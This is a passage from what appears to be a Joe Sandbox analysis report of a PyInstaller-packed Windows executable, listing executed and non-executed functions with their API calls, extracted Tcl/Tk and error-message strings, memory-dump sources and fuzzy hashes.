                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                                                                                        • Instruction ID: 2f07fd73f0c8fc885563c08f20999037900012723729f0298d93c34e04657fc7
                                                                                                                        • Opcode Fuzzy Hash: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                                                                                        • Instruction Fuzzy Hash: 5401E521A29B4280E908FB529D2506BE690FB49FE0F8A8630DE5C43BFADE3CD4014310
                                                                                                                        Function 00007FF7A6737330 Relevance: 1.3, APIs: 1, Instructions: 92COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryErrorLastRemove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 377330604-0
                                                                                                                        • Opcode ID: de2adb1bf489c698f757e3417ae5e0a26a5c09157b409e8aff6e044788b7f808
                                                                                                                        • Instruction ID: 8a84af5bdd8bbc3d9857c628d834023b5f971d2726ab3f56c8ae38dd438b6061
                                                                                                                        • Opcode Fuzzy Hash: de2adb1bf489c698f757e3417ae5e0a26a5c09157b409e8aff6e044788b7f808
                                                                                                                        • Instruction Fuzzy Hash: 01419B17D2E6C541E616AB24D9112FDA360FB9DB44F969232DF8D12163EF28F1C8C710
                                                                                                                        Function 00007FF7A674DD40 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • HeapAlloc.KERNEL32(?,?,00000000,00007FF7A674A8B6,?,?,?,00007FF7A6749A73,?,?,00000000,00007FF7A6749D0E), ref: 00007FF7A674DD95
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4292702814-0
                                                                                                                        • Opcode ID: 2e0f3e4b2c9ccc38d96cb592f5054ed38be707e8bf6a1ab6843b3be497aa41a7
                                                                                                                        • Instruction ID: a3e6e6e3f2918ebccdf7d133bf4a9a46d941174fc24c894216b35d86964c10e5
                                                                                                                        • Opcode Fuzzy Hash: 2e0f3e4b2c9ccc38d96cb592f5054ed38be707e8bf6a1ab6843b3be497aa41a7
                                                                                                                        • Instruction Fuzzy Hash: E4F04F54B3B20240FE98BA625D3D3B786805F8CF80FAA5432C94E463E2DD1CE4408930
                                                                                                                        Function 00007FF7A674CACC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF7A673FE44,?,?,?,00007FF7A6741356,?,?,?,?,?,00007FF7A6742949), ref: 00007FF7A674CB0A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4292702814-0
                                                                                                                        • Opcode ID: c69b2b415516246c39874758743c65376e97b2ba2b88f646b423658d781f7dfd
                                                                                                                        • Instruction ID: 2aa7c9230ea997b045f63c3b2f389451bc756c11f26c9637461067c86fa00f8c
                                                                                                                        • Opcode Fuzzy Hash: c69b2b415516246c39874758743c65376e97b2ba2b88f646b423658d781f7dfd
                                                                                                                        • Instruction Fuzzy Hash: 13F05E00F3B34680FE14B6B15C2D27791804F4CFE0F8A0630DD2E962E1ED2CE8408130

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00007FF7A67355D0 Relevance: 166.5, APIs: 31, Strings: 64, Instructions: 287libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                        • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$LOADER: Failed to load tcl/tk libraries$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                        • API String ID: 2238633743-1453502826
                                                                                                                        • Opcode ID: ba523ba2b13c4ea14ee618d69630f35f7ff64aa3d65f3ca8e14aa07d75cb9247
                                                                                                                        • Instruction ID: 1aaf6b7fe65fb8e2b6521365f665e7fd9a079ecca118d16efafc1fa5c589a92c
                                                                                                                        • Opcode Fuzzy Hash: ba523ba2b13c4ea14ee618d69630f35f7ff64aa3d65f3ca8e14aa07d75cb9247
                                                                                                                        • Instruction Fuzzy Hash: 20E1A864A3BB0391FA59FB14AC7427AA3A5AF0CF90BD65075C90D06278FF7CE5588720
                                                                                                                        Function 00007FF7A6731B90 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                        • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                        • API String ID: 2446303242-1601438679
                                                                                                                        • Opcode ID: 47b3578659853d453a5822a751c8e2f63cfdf798862dd1eeebf7592aa26dc86d
                                                                                                                        • Instruction ID: 7ae42906791f5c84752df6a5756ee46a5f3bf8e92175db805e736f5e941c53d9
                                                                                                                        • Opcode Fuzzy Hash: 47b3578659853d453a5822a751c8e2f63cfdf798862dd1eeebf7592aa26dc86d
                                                                                                                        • Instruction Fuzzy Hash: D9A17A32229B8187E7149F61E96479AB770F788B84F90413ADB8D07B28CF3DE165CB50
                                                                                                                        Function 00007FF7A67531CC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                        • API String ID: 808467561-2761157908
                                                                                                                        • Opcode ID: 46fb5d0366b8e1e712cdd684d815614daf2c7cda5b16cac76ba58e706ef79b66
                                                                                                                        • Instruction ID: 5afd123d2d74087fd1cc1813bd14e97da4590ca941d415b046091bd016efd6dc
                                                                                                                        • Opcode Fuzzy Hash: 46fb5d0366b8e1e712cdd684d815614daf2c7cda5b16cac76ba58e706ef79b66
                                                                                                                        • Instruction Fuzzy Hash: D7B22C72E292928BE724DF64D8507FEB7A1F748B54F811135DA0D57AACEF38A900CB50
                                                                                                                        Function 00007FF7A67374B0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,00007FF7A67326A0), ref: 00007FF7A67374D7
                                                                                                                        • FormatMessageW.KERNEL32(00000000,00007FF7A67326A0), ref: 00007FF7A6737506
                                                                                                                        • WideCharToMultiByte.KERNEL32 ref: 00007FF7A673755C
                                                                                                                          • Part of subcall function 00007FF7A6732620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7A6737744,?,?,?,?,?,?,?,?,?,?,?,00007FF7A673101D), ref: 00007FF7A6732654
                                                                                                                          • Part of subcall function 00007FF7A6732620: MessageBoxW.USER32 ref: 00007FF7A673272C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                        • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                        • API String ID: 2920928814-2573406579
                                                                                                                        • Opcode ID: 8b0166d5a5045c769a8e77ad43af0852bc728ff9b5502801be361ecb61f6b2fa
                                                                                                                        • Instruction ID: 73afb3d3e8771d35ab5e17f5abda2f30c0ca1e1a08069dfa728fe7eec8de5e38
                                                                                                                        • Opcode Fuzzy Hash: 8b0166d5a5045c769a8e77ad43af0852bc728ff9b5502801be361ecb61f6b2fa
                                                                                                                        • Instruction Fuzzy Hash: 42213D31A3AA4282E769AF11EC61367A365FF4CB84FC50039D54D826B9EF7CE545CB20
                                                                                                                        Function 00007FF7A673B69C Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3140674995-0
                                                                                                                        • Opcode ID: 24fff5600ca101af0e2334446d678d156eb325a0e0e0c0538aba544f51e330ab
                                                                                                                        • Instruction ID: 7976dbac6f4760409f5d0db025cfee500decb2dd93d46ed10353dd72185df54e
                                                                                                                        • Opcode Fuzzy Hash: 24fff5600ca101af0e2334446d678d156eb325a0e0e0c0538aba544f51e330ab
                                                                                                                        • Instruction Fuzzy Hash: 37315272615B8186EB64AF60EC503EEB370FB98B44F85443ADA4D47AA9DF3CD548C710
                                                                                                                        Function 00007FF7A6749AE4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1239891234-0
                                                                                                                        • Opcode ID: 4204087c2144b4154cc610f07160e172692864cccd6c23e577d201b1c5d7dbdf
                                                                                                                        • Instruction ID: 128a94b65bfc1a50356ab5d26bf7f80013024628d4c1aacf5794dd279ae2597a
                                                                                                                        • Opcode Fuzzy Hash: 4204087c2144b4154cc610f07160e172692864cccd6c23e577d201b1c5d7dbdf
                                                                                                                        • Instruction Fuzzy Hash: 2A319F32629B8186DB60DF25EC542AEB3A4FB88B54F910135EA8D43BA9DF3CC145CB10
                                                                                                                        Function 00007FF7A67509B4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2227656907-0
                                                                                                                        • Opcode ID: 1a8060551746b007c23963201f19a9fa9ddec40a19b74045b76b4ab8f762ca91
                                                                                                                        • Instruction ID: db0765c2264ce6ff6ba65773f0aa359f1c799426c20db1ecb959a92579d35a3b
                                                                                                                        • Opcode Fuzzy Hash: 1a8060551746b007c23963201f19a9fa9ddec40a19b74045b76b4ab8f762ca91
                                                                                                                        • Instruction Fuzzy Hash: 06B1B722B3A69681EA61BB219C641BBE350FB48FD4F954171DD6D07BA9DF3CE441C320
                                                                                                                        Function 00007FF7A6752D30 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: memcpy_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1502251526-0
                                                                                                                        • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                        • Instruction ID: 02318a38081214fc47292a376f3d4cffb4253208ad26a7781d349a42f52085c8
                                                                                                                        • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                        • Instruction Fuzzy Hash: 88C12672B2968587E7249F25A85466BF791F788B84F818135DB5E437A8DF3DEC00CB40
                                                                                                                        Function 00007FF7A6758B68 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionRaise_clrfp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 15204871-0
                                                                                                                        • Opcode ID: 34bf4ba4d1f77b159a602f4f3a79dc58b46c4397abc6f90fe1b78d3c276b8e03
                                                                                                                        • Instruction ID: ca4d5206cc0eb74bcf13fc798f782e9a94d49e54d73a182acd527bd0405dede2
                                                                                                                        • Opcode Fuzzy Hash: 34bf4ba4d1f77b159a602f4f3a79dc58b46c4397abc6f90fe1b78d3c276b8e03
                                                                                                                        • Instruction Fuzzy Hash: F3B19C73611B988BEB15DF29C8423697BE0F748F48F1A8962DA5D837B8CB39D451C710
                                                                                                                        Function 00007FF7A6737820 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2295610775-0
                                                                                                                        • Opcode ID: b154a429360a9d8fc422caeeb97d2d39407f5ca637504bf6a4efef03296319f0
                                                                                                                        • Instruction ID: 5deb527f2ba48d196e3b93896830558d36999f561791d56f441196b872d00844
                                                                                                                        • Opcode Fuzzy Hash: b154a429360a9d8fc422caeeb97d2d39407f5ca637504bf6a4efef03296319f0
                                                                                                                        • Instruction Fuzzy Hash: 72F0A93293978186E765DF60F8557A7B350FB48B64F410335D56D066E4DF3CD049CA10
                                                                                                                        Function 00007FF7A6742C04 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $
                                                                                                                        • API String ID: 0-227171996
                                                                                                                        • Opcode ID: 2d8c388a4af4e59f7aa018185c24a80b808f927c20487c79df8fa8b9671cd73b
                                                                                                                        • Instruction ID: 39418fe75b86096bdd1d3939f4d7ca35e3c99c5db1c8267fda7393d409afa363
                                                                                                                        • Opcode Fuzzy Hash: 2d8c388a4af4e59f7aa018185c24a80b808f927c20487c79df8fa8b9671cd73b
                                                                                                                        • Instruction Fuzzy Hash: 9BE1DA3A92A64281D768AE25896C13AA360FF4CF58FA60235DA1E077B4DF39DC61C750
                                                                                                                        Function 00007FF7A674D098 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
